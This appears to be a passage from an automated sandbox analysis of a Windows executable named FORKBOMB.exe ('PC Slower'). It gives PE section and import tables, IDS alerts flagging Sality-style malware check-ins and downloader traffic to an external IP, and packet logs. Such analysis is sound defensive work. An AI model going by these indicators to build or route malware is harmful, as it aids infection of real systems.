                                                                        jno 00007F37B8FF8818h

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x161740xc8.data
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x11cfc.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x164680x22c.data
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .code0x10000x37f00x3800fe75fa7d9b385c0a0b0804ee83b251deFalse0.48890904017857145OpenPGP Public Key5.73311566792361IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .text0x50000xcfa20xd0003d44adf99d47c66df6ed2c6ecde44714False0.5135028545673077data6.585820316040298IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x120000x33a00x3400e4a2346f39e8c4c981487f3b09547fafFalse0.8046123798076923data7.110235506298317IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x160000x17240x1200dd2f25f3575e4735cb7da5b6f3cd4e3aFalse0.390625data4.935744306686906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0x180000x240000x23e002990ce2d425a9fcc5b73f51d51551132False0.928823225174216data7.769782214367897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x183b40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.7136524822695035
                                                                        RT_ICON0x1881c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m0.5737704918032787
                                                                        RT_ICON0x191a40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.5011726078799249
                                                                        RT_ICON0x1a24c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.4263485477178423
                                                                        RT_ICON0x1c7f40xcedbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0001699556226986
                                                                        RT_RCDATA0x296d00xezlib compressed data1.5714285714285714
                                                                        RT_RCDATA0x296e00x9data1.8888888888888888
                                                                        RT_RCDATA0x296ec0x1very short file (no magic)9.0
                                                                        RT_RCDATA0x296f00x1bdata1.3333333333333333
                                                                        RT_GROUP_ICON0x2970c0x4cdata0.7763157894736842
                                                                        RT_VERSION0x297580x304data0.47020725388601037
                                                                        RT_MANIFEST0x29a5c0x2a0XML 1.0 document, ASCII text, with very long lines (672), with no line terminators0.5520833333333334

                                                                        Imports

                                                                        DLLImport
                                                                        MSVCRT.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                                                                        KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, GetProcAddress, GetVersionExW, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                                                                        USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                                                        GDI32.DLLGetStockObject
                                                                        COMCTL32.DLLInitCommonControlsEx
                                                                        SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                                                        WINMM.DLLtimeBeginPeriod
                                                                        OLE32.DLLCoInitialize, CoTaskMemFree
                                                                        SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW

                                                                        Version Infos

                                                                        DescriptionData
                                                                        FileVersion1.1.1.1
                                                                        ProductVersion1.1.1.1
                                                                        ProductNameFork
                                                                        OriginalFilenameFORKBOMB.exe
                                                                        InternalNameFork.exe
                                                                        FileDescriptionPC Slower
                                                                        CompanyNamebakonco.
                                                                        LegalTrademarksbakon7651
                                                                        LegalCopyrightbakon7651 2024 All rights reserved.
                                                                        Translation0x0000 0x04e4

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-03-16T23:04:30.442279+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.9496833.229.117.5780TCP
                                                                        2025-03-16T23:04:30.442279+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496833.229.117.5780TCP
                                                                        2025-03-16T23:04:30.443194+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.229.117.5780192.168.2.949683TCP
                                                                        2025-03-16T23:04:32.050016+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.9496843.229.117.5780TCP
                                                                        2025-03-16T23:04:32.050016+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496843.229.117.5780TCP
                                                                        2025-03-16T23:04:33.069551+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496853.229.117.5780TCP
                                                                        2025-03-16T23:04:34.249537+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496863.229.117.5780TCP
                                                                        2025-03-16T23:04:36.427630+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496873.229.117.5780TCP
                                                                        2025-03-16T23:04:38.004184+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496883.229.117.5780TCP
                                                                        2025-03-16T23:04:39.615694+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496893.229.117.5780TCP
                                                                        2025-03-16T23:04:39.615704+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.229.117.5780192.168.2.949689TCP
                                                                        2025-03-16T23:04:40.387921+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496903.229.117.5780TCP
                                                                        2025-03-16T23:04:42.547516+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496913.229.117.5780TCP
                                                                        2025-03-16T23:04:43.450009+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496923.229.117.5780TCP
                                                                        2025-03-16T23:04:44.221151+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496933.229.117.5780TCP
                                                                        2025-03-16T23:04:45.214955+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496943.229.117.5780TCP
                                                                        2025-03-16T23:04:46.797140+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496963.229.117.5780TCP
                                                                        2025-03-16T23:04:47.932507+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9496983.229.117.5780TCP
                                                                        2025-03-16T23:04:50.169165+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9497003.229.117.5780TCP
                                                                        2025-03-16T23:04:51.260540+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9497043.229.117.5780TCP
                                                                        2025-03-16T23:04:54.378866+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.9497073.229.117.5780TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Mar 16, 2025 23:04:29.952701092 CET4968380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:29.957498074 CET80496833.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:29.957911015 CET4968380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:29.982558012 CET4968380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:29.987240076 CET80496833.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:30.442202091 CET80496833.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:30.442279100 CET4968380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:30.443193913 CET80496833.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:30.443394899 CET4968380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:30.475413084 CET4968380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:30.480031967 CET80496833.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:31.559601068 CET4968480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:31.564322948 CET80496843.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:31.564385891 CET4968480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:31.564620018 CET4968480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:31.569283009 CET80496843.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:32.049948931 CET80496843.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:32.050015926 CET4968480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:32.050043106 CET80496843.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:32.050209999 CET4968480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:32.060465097 CET4968480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:32.065495968 CET80496843.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:32.587627888 CET4968580192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:32.592561007 CET80496853.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:32.592716932 CET4968580192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:32.619930029 CET4968580192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:32.624639034 CET80496853.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:33.069434881 CET80496853.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:33.069511890 CET80496853.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:33.069550991 CET4968580192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:33.069595098 CET4968580192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:33.087145090 CET4968580192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:33.091907024 CET80496853.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:33.780139923 CET4968680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:33.784868956 CET80496863.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:33.785062075 CET4968680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:33.792232037 CET4968680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:33.798532963 CET80496863.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:34.249465942 CET80496863.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:34.249536991 CET4968680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:34.249560118 CET80496863.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:34.249624968 CET4968680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:34.274741888 CET4968680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:34.279408932 CET80496863.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:35.969729900 CET4968780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:35.974857092 CET80496873.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:35.974946976 CET4968780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:36.026817083 CET4968780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:36.031763077 CET80496873.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:36.427499056 CET80496873.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:36.427629948 CET4968780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:36.427783966 CET80496873.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:36.427854061 CET4968780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:36.442506075 CET4968780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:36.447163105 CET80496873.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:37.522607088 CET4968880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:37.527482986 CET80496883.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:37.527563095 CET4968880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:37.542903900 CET4968880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:37.547602892 CET80496883.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:38.004046917 CET80496883.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:38.004100084 CET80496883.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:38.004184008 CET4968880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:38.133480072 CET4968880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:38.139015913 CET80496883.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:39.145323992 CET4968980192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.150074005 CET80496893.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:39.150156975 CET4968980192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.207050085 CET4968980192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.212708950 CET80496893.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:39.615609884 CET80496893.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:39.615694046 CET4968980192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.615704060 CET80496893.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:39.615814924 CET4968980192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.710997105 CET4968980192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.715786934 CET80496893.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:39.716414928 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.721141100 CET80496903.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:39.721225977 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.797686100 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.929034948 CET80496903.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:40.387845993 CET80496903.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:40.387921095 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:40.387995005 CET80496903.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:40.388053894 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:40.443881989 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:40.448570967 CET80496903.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.074883938 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.081314087 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.081422091 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.143299103 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.149465084 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.547389030 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.547410011 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.547516108 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.585958004 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.590745926 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.969806910 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.974533081 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.974647045 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.083952904 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.089538097 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.449911118 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.449961901 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.450009108 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.450042009 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.471916914 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.476691961 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.755649090 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.760952950 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.761044025 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.821810961 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.826764107 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.221091986 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.221151114 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.221252918 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.221371889 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.261296034 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.266181946 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.746764898 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.751620054 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.751713991 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.751832008 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.756939888 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:45.214785099 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:45.214849949 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:45.214955091 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:45.304122925 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:45.308959961 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.331707954 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.336448908 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.336555958 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.397324085 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.402116060 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.797034979 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.797064066 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.797139883 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.885746956 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.890547037 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.472486973 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.477310896 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.477607012 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.492856979 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.497623920 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.932394028 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.932418108 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.932507038 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.932507992 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.954369068 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.961185932 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:49.692322969 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:49.697433949 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:49.697513103 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:49.721376896 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:49.726241112 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.169111967 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.169137001 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.169164896 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.169192076 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.171643972 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.176342964 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.780802965 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.785552025 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.785680056 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.789079905 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.793745995 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:51.260462046 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:51.260540009 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:51.260598898 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:51.260648012 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:51.609644890 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:51.615309000 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:53.914643049 CET4970780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:53.921636105 CET80497073.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:53.921722889 CET4970780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:53.936327934 CET4970780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:53.943310022 CET80497073.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:54.378576994 CET80497073.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:54.378607035 CET80497073.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:54.378865957 CET4970780192.168.2.93.229.117.57

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Mar 16, 2025 23:04:25.685231924 CET530306759192.168.2.946.98.127.9
                                                                        Mar 16, 2025 23:04:28.427220106 CET6261853192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:28.848244905 CET53626181.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:29.267972946 CET6181253192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:29.519452095 CET53618121.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:29.662575960 CET5755753192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:29.678014994 CET53575571.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:29.744261980 CET5941053192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:29.938927889 CET53594101.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:30.670660019 CET6251353192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:31.091872931 CET53625131.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:31.168420076 CET5136553192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:31.184340000 CET53513651.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:31.346298933 CET5714753192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:31.353436947 CET53571471.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:31.365132093 CET5301353192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:31.549717903 CET53530131.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:34.938630104 CET5902553192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:34.945987940 CET53590251.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:35.376758099 CET5801753192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:35.386795044 CET53580171.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:35.747778893 CET5900953192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:35.861602068 CET53590091.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:36.754764080 CET6350853192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:36.968828917 CET53635081.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:37.166395903 CET5210653192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:37.175748110 CET53521061.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:37.409833908 CET6296653192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:37.441509008 CET53629661.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:40.962907076 CET5162653192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:41.391596079 CET53516261.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:41.616554976 CET5942053192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:41.635135889 CET53594201.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:41.840270042 CET5742153192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:41.859850883 CET53574211.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:42.776067019 CET6377853192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:42.784107924 CET53637781.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:42.867494106 CET5364253192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:42.920932055 CET53536421.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:42.937671900 CET5694053192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:42.951034069 CET53569401.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:45.610960007 CET5223653192.168.2.91.1.1.1
                                                                        Mar 16, 2025 23:04:45.826522112 CET53522361.1.1.1192.168.2.9
                                                                        Mar 16, 2025 23:04:47.300482988 CET4933553192.168.2.91.1.1.1
